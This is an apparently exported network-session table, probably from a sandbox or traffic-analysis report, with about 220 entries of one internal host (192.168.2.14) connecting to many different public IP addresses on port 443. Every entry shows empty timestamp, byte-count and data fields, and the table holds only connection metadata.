                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13094192.168.2.146017447.253.232.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13095192.168.2.1449768126.51.53.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13096192.168.2.145405836.27.107.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13097192.168.2.1448452131.140.182.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13098192.168.2.1455964115.115.153.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13099192.168.2.1458162190.147.145.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13100192.168.2.1438224112.25.242.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13101192.168.2.145027060.17.22.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13102192.168.2.1458010202.192.250.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13103192.168.2.144286214.53.224.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13104192.168.2.1450222178.191.67.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13105192.168.2.1437458118.10.197.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13106192.168.2.1460338207.253.197.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13107192.168.2.143544271.214.254.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13108192.168.2.1444148199.156.15.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13109192.168.2.1459552106.244.151.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13110192.168.2.1434160190.15.194.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13111192.168.2.143528246.186.37.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13112192.168.2.1458112113.176.182.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13113192.168.2.144927289.114.87.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13114192.168.2.1438418145.205.13.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13115192.168.2.144872854.103.22.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13116192.168.2.1456900212.128.74.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13117192.168.2.143833048.109.4.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13118192.168.2.1443136190.200.195.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13119192.168.2.143726890.104.78.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13120192.168.2.1455670199.151.44.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13121192.168.2.146061067.103.166.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13122192.168.2.144955027.236.84.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13123192.168.2.1457896195.210.166.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13124192.168.2.1456118216.61.130.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13125192.168.2.145854434.52.132.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13126192.168.2.144429420.189.148.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13127192.168.2.145983484.186.109.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13128192.168.2.1453718209.11.97.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13129192.168.2.145562417.92.177.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13130192.168.2.1440110120.238.128.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13131192.168.2.1449756132.17.17.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13132192.168.2.1440154130.30.232.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13133192.168.2.1446158137.71.48.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13134192.168.2.1437516119.158.170.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13135192.168.2.143590083.30.109.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13136192.168.2.1452394169.24.106.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13137192.168.2.145791473.171.98.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13138192.168.2.1453576128.200.200.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13139192.168.2.144517276.176.62.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13140192.168.2.1434836104.104.32.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13141192.168.2.1444552116.147.236.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13142192.168.2.1438736200.125.255.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13143192.168.2.145934823.94.120.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13144192.168.2.145765074.183.100.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13145192.168.2.145964618.224.203.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13146192.168.2.145920074.123.4.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13147192.168.2.1442916124.139.11.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13148192.168.2.1438774184.133.145.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13149192.168.2.1460650137.63.134.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13150192.168.2.144742664.0.242.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13151192.168.2.144600042.163.158.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13152192.168.2.1446000195.98.194.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13153192.168.2.1445362104.37.127.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13154192.168.2.1451120131.128.193.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13155192.168.2.1435006201.103.142.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13156192.168.2.144922044.193.158.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13157192.168.2.1449080115.108.153.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13158192.168.2.1453834145.89.188.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13159192.168.2.1451858119.135.238.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13160192.168.2.145741674.146.174.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13161192.168.2.1456538125.183.42.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13162192.168.2.145282897.181.206.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13163192.168.2.145847899.64.82.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13164192.168.2.1439144188.212.168.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13165192.168.2.143846246.59.110.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13166192.168.2.1446508175.83.250.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13167192.168.2.144722279.74.148.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13168192.168.2.1441432102.129.208.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13169192.168.2.145849619.250.71.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13170192.168.2.1458586193.80.168.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13171192.168.2.145007891.88.81.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13172192.168.2.144618837.193.150.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13173192.168.2.1447930217.113.141.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13174192.168.2.1443604162.169.34.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13175192.168.2.1457214121.155.124.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13176192.168.2.1434688107.127.91.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13177192.168.2.1446576164.52.129.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13178192.168.2.1440622126.190.118.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13179192.168.2.1437810189.53.89.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13180192.168.2.1441770162.94.180.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13181192.168.2.1455840210.17.151.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13182192.168.2.145879067.120.150.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13183192.168.2.143628046.242.187.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13184192.168.2.145047653.124.164.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13185192.168.2.1458752125.252.41.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13186192.168.2.1449616217.177.27.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13187192.168.2.1442690128.5.42.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13188192.168.2.145950695.248.33.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13189192.168.2.1454584202.206.178.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13190192.168.2.1440216179.101.254.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13191192.168.2.144848258.117.67.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13192192.168.2.1441490157.180.31.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13193192.168.2.144103478.59.177.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13194192.168.2.1446044216.129.230.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13195192.168.2.145334234.248.93.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13196192.168.2.1439958191.31.207.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13197192.168.2.144757290.116.236.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13198192.168.2.1449518164.240.29.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13199192.168.2.1438710210.222.104.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13200192.168.2.1454034175.62.29.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13201192.168.2.1435694134.113.23.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13202192.168.2.1438458130.57.225.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13203192.168.2.143418064.5.238.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13204192.168.2.1449464174.189.44.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13205192.168.2.143761870.130.181.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13206192.168.2.1444932223.221.203.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13207192.168.2.143542625.34.170.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13208192.168.2.143550618.174.37.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13209192.168.2.1451288155.65.34.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13210192.168.2.1453690169.217.95.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13211192.168.2.1436256196.152.240.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13212192.168.2.145721060.15.232.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13213192.168.2.143961232.119.155.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13214192.168.2.1445500129.54.57.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13215192.168.2.145527445.201.16.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13216192.168.2.1455330126.33.19.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13217192.168.2.1446296158.82.173.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13218192.168.2.1447324182.221.70.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13219192.168.2.146085853.171.27.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13220192.168.2.145477213.32.161.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13221192.168.2.1442136203.228.79.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13222192.168.2.145754644.203.127.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13223192.168.2.1453482105.56.123.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13224192.168.2.144761867.92.2.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13225192.168.2.1451332175.113.4.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13226192.168.2.145036476.211.83.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13227192.168.2.1447756152.89.204.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13228192.168.2.143420820.98.202.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13229192.168.2.143947440.86.233.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13230192.168.2.144443298.115.22.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13231192.168.2.1443776139.198.86.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13232192.168.2.1438724187.92.156.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13233192.168.2.144160664.23.179.238443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13234192.168.2.1437590157.220.186.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13235192.168.2.1439118195.167.25.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13236192.168.2.1438468160.126.200.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13237192.168.2.1455986186.219.50.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13238192.168.2.1438354120.67.40.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13239192.168.2.1460560204.67.164.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13240192.168.2.1453208151.145.139.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13241192.168.2.1452562159.200.153.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13242192.168.2.143451645.19.44.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13243192.168.2.145412663.143.140.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13244192.168.2.145086459.205.52.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13245192.168.2.1445564123.91.172.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13246192.168.2.145779097.83.113.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13247192.168.2.144288089.149.149.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13248192.168.2.143810295.99.233.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13249192.168.2.143908685.76.2.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13250192.168.2.143740423.185.168.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13251192.168.2.144043695.116.48.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13252192.168.2.144885023.185.200.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13253192.168.2.143592880.209.216.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13254192.168.2.1436494203.248.69.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13255192.168.2.143519487.122.197.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13256192.168.2.144615238.176.123.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13257192.168.2.145318643.147.122.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13258192.168.2.145995860.158.208.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13259192.168.2.1447332153.169.94.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13260192.168.2.1442226204.200.169.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13261192.168.2.1446280132.56.71.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13262192.168.2.1435920223.11.166.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13263192.168.2.1448166105.93.133.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13264192.168.2.1440628157.250.34.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13265192.168.2.144176488.73.125.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13266192.168.2.14519121.175.52.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13267192.168.2.1448840144.177.150.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13268192.168.2.1437436109.43.248.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13269192.168.2.146070074.225.161.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13270192.168.2.144318267.56.157.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13271192.168.2.145854062.65.57.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13272192.168.2.143494069.129.248.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13273192.168.2.145649038.167.151.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13274192.168.2.1459954141.75.70.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13275192.168.2.1444532176.92.222.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13276192.168.2.1455238178.152.61.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13277192.168.2.143895681.65.38.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13278192.168.2.143872612.55.45.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13279192.168.2.1440158107.108.149.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13280192.168.2.145002620.73.28.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13281192.168.2.1453912175.194.124.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13282192.168.2.1459558155.192.135.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13283192.168.2.1435926142.43.30.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13284192.168.2.144162868.54.238.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13285192.168.2.1437650117.69.203.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13286192.168.2.1445826190.241.21.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13287192.168.2.1440612143.34.206.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13288192.168.2.1453714154.181.216.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13289192.168.2.1459320107.169.191.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13290192.168.2.145692469.8.241.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13291192.168.2.1450800211.31.193.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13292192.168.2.14409009.201.40.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13293192.168.2.145952632.159.247.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13294192.168.2.1445998104.189.78.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13295192.168.2.1451998130.155.211.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13296192.168.2.143412263.23.79.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13297192.168.2.146066638.129.13.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13298192.168.2.145477074.89.139.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13299192.168.2.145786274.221.219.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13300192.168.2.146055660.169.230.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13301192.168.2.145800231.76.101.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13302192.168.2.145799218.159.249.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13303192.168.2.1448500152.188.229.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13304192.168.2.144605840.154.158.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13305192.168.2.14589149.119.181.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13306192.168.2.1457098112.46.117.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13307192.168.2.143909694.62.188.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13308192.168.2.144226479.76.209.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13309192.168.2.144009836.52.110.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13310192.168.2.1445146139.179.103.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13311192.168.2.1435500144.67.170.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13312192.168.2.1456604113.132.145.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13313192.168.2.143885872.147.165.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13314192.168.2.145863075.181.39.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13315192.168.2.1437970186.239.15.153443
                                              TimestampBytes transferredDirectionData


